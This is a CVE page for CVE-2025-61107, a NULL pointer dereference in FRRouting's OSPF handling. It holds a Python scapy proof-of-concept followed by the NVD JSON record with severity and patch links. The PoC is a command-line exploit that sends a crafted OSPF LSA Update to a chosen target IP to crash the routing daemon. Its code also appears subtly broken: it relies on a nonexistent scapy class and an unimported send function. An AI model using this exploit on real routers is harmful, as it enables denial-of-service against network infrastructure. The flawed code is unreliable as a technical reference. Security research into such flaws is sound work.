CVE-2025-61107

#!/usr/bin/env python3 """ CVE-2025-61107 PoC - FRRouting frr NULL Pointer Dereference This PoC demonstrates triggering the NULL pointer dereference in FRRouting via a crafted OSPF LSA Update packet containing malformed Extended Prefix SID. Note: This is for educational and security research purposes only. Author: Security Research """ from scapy.all import IP, IPv6, OSPF, OSPF_LSA, OSPF_LSA_ExtendedPrefix, Raw import socket import struct def craft_malformed_lsa_update(target_ip, router_id): """ Craft a malformed OSPF LSA Update packet to trigger NULL pointer dereference in FRRouting's show_vty_ext_pref_pref_sid function (ospf_ext.c) """ # OSPF Header ospf_header = OSPF( version=2, type=4, # LSA Update len=0, src=router_id, id=socket.inet_aton(router_id), area=socket.inet_aton('0.0.0.0') ) # Craft malformed Extended Prefix LSA with NULL pointer trigger # The Extended Prefix SID sub-TLV with specific flags can cause NULL dereference malformed_ext_prefix = OSPF_LSA_ExtendedPrefix( reserved1=0, route_type=1, prefix_length=32, address_prefix=target_ip, # Extended Prefix SID sub-TLV - trigger condition sub_tlv_type=1, # Extended Prefix SID sub_tlv_length=8, flags=0x40, # NP flag set, causing NULL pointer access algorithm=0, sid_label=0 ) # Construct the malicious LSA malicious_lsa = OSPF_LSA( age=0, type=0x8009, # OSPF Extended Prefix LSA (Type 9 with E-bit) id=struct.pack('>I', 1), advrtr=socket.inet_aton(router_id), seq=0x80000001, chksum=0, len=len(malformed_ext_prefix), payload=malformed_ext_prefix ) # OSPF LSA Update packet with malformed LSA lsa_update = ospf_header / OSPF_LSA(count=1) / malicious_lsa return IP(dst=target_ip, src=router_id) / ospf_header / OSPF_LSA(count=1) / malicious_lsa def send_exploit(target_ip, router_id='10.0.0.1', interface='eth0'): """ Send the crafted exploit packet to trigger the vulnerability """ print(f"[*] Crafting malicious OSPF LSA Update packet for {target_ip}") print(f"[*] Source Router ID: {router_id}") # Craft the malicious packet packet = craft_malformed_lsa_update(target_ip, router_id) print("[*] Sending exploit packet...") # Note: Requires raw socket privileges and proper OSPF configuration send(packet, iface=interface, verbose=0) print("[+] Exploit packet sent successfully") print("[*] Target should experience DoS if vulnerable") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 cve-2025-61107.py <target_ip> [router_id]") sys.exit(1) target = sys.argv[1] router_id = sys.argv[2] if len(sys.argv) > 2 else "10.0.0.1" try: send_exploit(target, router_id) except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2025-61107", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:13.243", "lastModified": "2025-10-31T18:46:51.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FRRouting/frr from v4.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the show_vty_ext_pref_pref_sid function at ospf_ext.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted LSA Update packet."}, {"lang": "es", "value": "FRRouting/frr desde v4.0 hasta v10.4.1 se descubrió que contenía una desreferencia de puntero NULL a través de la función show_vty_ext_pref_pref_sid en ospf_ext.c. Esta vulnerabilidad permite a los atacantes causar una denegación de servicio (DoS) a través de un paquete de actualización LSA manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndIncluding": "10.4.1", "matchCriteriaId": "B41245C0-85A2-4A77-BF46-27F573E6F588"}]}]}], "references": [{"url": "https://github.com/FRRouting/frr/issues/19471", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480/commits/fdd957408605d4a1766225630aafc7e6b7c3daf3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61107.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}